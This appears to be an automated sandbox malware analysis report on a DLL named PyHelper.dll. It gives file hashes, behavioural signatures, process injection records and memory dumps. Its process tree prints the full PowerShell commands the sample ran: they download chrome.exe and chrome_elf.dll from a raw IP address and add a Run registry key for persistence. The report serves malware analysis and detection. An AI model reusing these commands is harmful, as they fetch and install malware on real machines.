Analysis
- max time kernel: 727s
- max time network: 1596s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 11-05-2024 10:41
- Static task: static1
- Behavioral task: behavioral1 (Sample: PyHelper.dll, Resource: win10-20240404-en)
- Behavioral task: behavioral2 (Sample: PyHelper.dll, Resource: win7-20240221-en)
- Behavioral task: behavioral3 (Sample: PyHelper.dll, Resource: win10v2004-20240508-en)
- Behavioral task: behavioral4 (Sample: PyHelper.dll, Resource: win11-20240508-en)
General
- Target: PyHelper.dll
- Size: 236KB
- MD5: b7bd2243978cfe44cc0d4b28086c4004
- SHA1: bbc0f43de71cddc0a1be48fa98b936ebffb817ac
- SHA256: bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455
- SHA512: e7f924564bcf1a6173cf29bbbcb16994b3e527a93c1059e7be8e86aa5f5887a852a6a9084862caf3e192a5a70336e6ee22bc169c1f1e0300fa72bb9049a0141f
- SSDEEP: 3072:aSro30CSFTVOo7qzijtY7HBGsBel05YGoAgbceBBCxRXu+E+NO9o6Kgv:akoELH7k8tY7HkLljr1CTbE55
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  Processes:
  flow | pid  | process
  30   | 1616 | powershell.exe
  31   | 520  | powershell.exe
  32   | 1196 | powershell.exe
- Processes:
  pid  | process
  1616 | powershell.exe
  520  | powershell.exe
  1196 | powershell.exe
- Downloads MZ/PE file
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
  description     | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\Documents\\chrome.exe" | powershell.exe
- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes:
  pid  | process
  1616 | powershell.exe
  3064 | powershell.exe
  1196 | powershell.exe
  520  | powershell.exe
  3064 | powershell.exe
  520  | powershell.exe
  1616 | powershell.exe
  1196 | powershell.exe
  3064 | powershell.exe
  520  | powershell.exe
  1616 | powershell.exe
  1196 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  description             | pid  | process
  Token: SeDebugPrivilege | 1616 | powershell.exe
  Token: SeDebugPrivilege | 3064 | powershell.exe
  Token: SeDebugPrivilege | 1196 | powershell.exe
  Token: SeDebugPrivilege | 520  | powershell.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  Processes:
  description                        | pid  | process           | target process
  PID 208 wrote to memory of 2544    | 208  | regsvr32.exe      | RuntimeBroker.exe
  PID 208 wrote to memory of 2544    | 208  | regsvr32.exe      | RuntimeBroker.exe
  PID 208 wrote to memory of 2544    | 208  | regsvr32.exe      | RuntimeBroker.exe
  PID 208 wrote to memory of 2544    | 208  | regsvr32.exe      | RuntimeBroker.exe
  PID 208 wrote to memory of 2544    | 208  | regsvr32.exe      | RuntimeBroker.exe
  PID 208 wrote to memory of 2544    | 208  | regsvr32.exe      | RuntimeBroker.exe
  PID 2544 wrote to memory of 1616   | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 1616   | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 1196   | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 1196   | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 520    | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 520    | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 3064   | 2544 | RuntimeBroker.exe | powershell.exe
  PID 2544 wrote to memory of 3064   | 2544 | RuntimeBroker.exe | powershell.exe
Processes
- C:\Windows\system32\regsvr32.exe
  Command line: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\PyHelper.dll
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\RuntimeBroker.exe
    Command line: RuntimeBroker.exe
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: -C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome_elf.dll" -OutFile "$env:USERPROFILE\Documents\chrome_elf.dll""
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: -C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome.exe" -OutFile "$env:USERPROFILE\Documents\chrome.exe""
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: -C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/105.0.5195.102.manifest" -OutFile "$env:USERPROFILE\Documents\105.0.5195.102.manifest""
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: -C "New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "update" -Value "$env:USERPROFILE\Documents\chrome.exe" -PropertyType "String" -Force"
      Signatures: Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 5d574dc518025fad52b7886c1bff0e13
  SHA1: 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
  SHA256: 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
  SHA512: 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: c2a0895dd601c9bfa22352c472c6fc5a
  SHA1: e9ecd26c4c3333d9dcaee95dff114813af7a9eaf
  SHA256: ad05818cdd39080d26c75b3260d38a31e991f81c23b5ed34e1fe7f2f2a61a10a
  SHA512: 8e2ecc93e19c445e2f3a97912e101180f5a9e46099cb112993f75758525f0d9cf33feb89d128eb94075bf53f42c9f253100380eb5c71f6581f4b4fa2344205c4
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 536B
  MD5: d908fa4be1a0ccf57ba13cad033901c7
  SHA1: 847ab3b123c95ff7c6ff66ce4e64e2a0fc746ca7
  SHA256: 53225ff1ab4c6afd787c84b7110cd20e9ff59158cca86451c5991d2bb4f6611e
  SHA512: 8e9c43705197be93f700752fdbcaa25d3d8c60e8a2a78e9cc09591fbe0bad60c2715cf1bc8e8cc323657eda701858125466e042bb4a8010e9443a213e81a6ac4
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqnbx2jr.wkl.ps1
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
- memory/208-5-0x0000000062540000-0x0000000062598000-memory.dmp
  Filesize: 352KB
- memory/208-6-0x0000000062540000-0x0000000062598000-memory.dmp
  Filesize: 352KB
- memory/208-4-0x0000000062540000-0x0000000062598000-memory.dmp
  Filesize: 352KB
- memory/208-12-0x0000000062540000-0x0000000062598000-memory.dmp
  Filesize: 352KB
- memory/208-20-0x0000000062540000-0x0000000062598000-memory.dmp
  Filesize: 352KB
- memory/1616-51-0x0000021CC1020000-0x0000021CC1042000-memory.dmp
  Filesize: 136KB
- memory/2544-9-0x000001D49A060000-0x000001D49A061000-memory.dmp
  Filesize: 4KB
- memory/2544-24-0x000001D49A090000-0x000001D49A0AD000-memory.dmp
  Filesize: 116KB
- memory/2544-23-0x00007FFDED465000-0x00007FFDED466000-memory.dmp
  Filesize: 4KB
- memory/2544-13-0x000001D49A030000-0x000001D49A04A000-memory.dmp
  Filesize: 104KB
- memory/2544-14-0x000001D49A090000-0x000001D49A0AD000-memory.dmp
  Filesize: 116KB
- memory/2544-10-0x00007FFDED465000-0x00007FFDED466000-memory.dmp
  Filesize: 4KB
- memory/2544-8-0x000001D49A050000-0x000001D49A051000-memory.dmp
  Filesize: 4KB
- memory/3064-54-0x0000028555720000-0x0000028555796000-memory.dmp
  Filesize: 472KB